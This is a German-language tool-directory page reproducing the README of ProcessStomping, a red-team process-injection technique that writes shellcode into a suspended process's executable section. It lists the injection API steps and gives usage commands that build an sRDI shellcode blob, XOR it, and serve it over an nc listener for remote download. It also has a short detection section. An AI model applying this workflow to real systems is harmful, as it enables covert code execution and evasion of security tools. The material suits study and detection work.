Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ProcessStomping — Eine Variation von ProcessOverwriting, um Shellcode auf einem Abschnitt einer ausführbaren Datei auszuführen. | Kitploit
Tools/GitHubGitHub/naksyn/processstomping
ShellcodePost-ExploitationLernen & BildungRed TeamingPayload-EntwicklungBinary-Exploitation
GitHubnaksyn/processstomping

ProcessStomping

Eine Variation von ProcessOverwriting, um Shellcode auf einem Abschnitt einer ausführbaren Datei auszuführen.

Repository anzeigen
14727vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ProcessStomping

A variation of ProcessOverwriting to execute shellcode on an executable's section

Twitter

Was ist das

Für eine detailliertere Erklärung kannst du meinen Blogbeitrag lesen.

Process Stomping ist eine Variation von hasherezade's Process Overwriting und hat den Vorteil, dass ein Shellcode-Payload auf einen gezielten Abschnitt geschrieben wird, anstatt einen gesamten PE-Payload über den Adressraum des Hosting-Prozesses zu schreiben.

Dies sind die Hauptschritte der ProcessStomping-Technik:

  1. CreateProcess – Setzen des Process Creation Flags auf CREATE_SUSPENDED (0x00000004), um den primären Thread des Prozesses zu unterbrechen.
  2. WriteProcessMemory – Wird verwendet, um jeden schädlichen Shellcode in den Zielprozessabschnitt zu schreiben.
  3. SetThreadContext – Wird verwendet, um den Einstiegspunkt auf einen neuen Codeabschnitt zu setzen, der geschrieben wurde.
  4. ResumeThread – selbsterklärend.

Als Beispielanwendung der Technik kann der PoC mit sRDI verwendet werden, um eine Beacon-DLL über einen ausführbaren RWX-Abschnitt zu laden. Das folgende Bild beschreibt die beteiligten Schritte.

immagine

Haftungsausschluss

Alle Informationen und Inhalte werden ausschließlich zu Bildungszwecken bereitgestellt. Befolgen Sie die Anweisungen auf eigenes Risiko. Weder der Autor noch sein Arbeitgeber haften für direkte oder indirekte Schäden oder Verluste, die aus Personen oder Organisationen entstehen.

Danksagungen

Diese Arbeit wurde durch das Wissen und die Werkzeuge ermöglicht, die von Aleksandra Doniec @hasherezade und Nick Landers geteilt wurden.

Verwendung

Wählen Sie Ihren Zielprozess und passen Sie die globalen Variablen entsprechend in ProcessStomping.cpp an.

Kompilieren Sie das sRDI-Projekt und stellen Sie sicher, dass der Offset ausreicht, um über Ihren generierten sRDI-Shellcode-Blob zu springen, und aktualisieren Sie dann die sRDI-Tools:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Generieren Sie ein Reflective-Loaderless-DLL-Payload Ihrer Wahl und generieren Sie dann einen sRDI-Shellcode-Blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

Der Shellcode-Blob kann dann mit einem Schlüsselwort ge-xored und über einen einfachen Socket heruntergeladen werden:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Ausliefern des ge-xored Blobs bei Verbindung:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

Der sRDI-Blob wird nach der Ausführung gelöscht, um unnötige Artefakte zu entfernen.

Demo

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

Einschränkungen

Um diese Technik erfolgreich auszuführen, sollten Sie den richtigen Zielprozess auswählen und ein DLL-Payload verwenden, das keinen benutzerdefinierten Reflective Loader enthält.

Erkennungsmöglichkeiten

Die Process Stomping-Technik erfordert das Starten des Zielprozesses in einem angehaltenen Zustand, das Ändern des Einstiegspunkts des Threads und anschließend das Fortsetzen des Threads, um den injizierten Shellcode auszuführen. Dies sind Operationen, die als verdächtig angesehen werden könnten, wenn sie in schneller Folge ausgeführt werden, und könnten zu einer verstärkten Überprüfung durch einige Sicherheitslösungen führen.

Tool herunterladen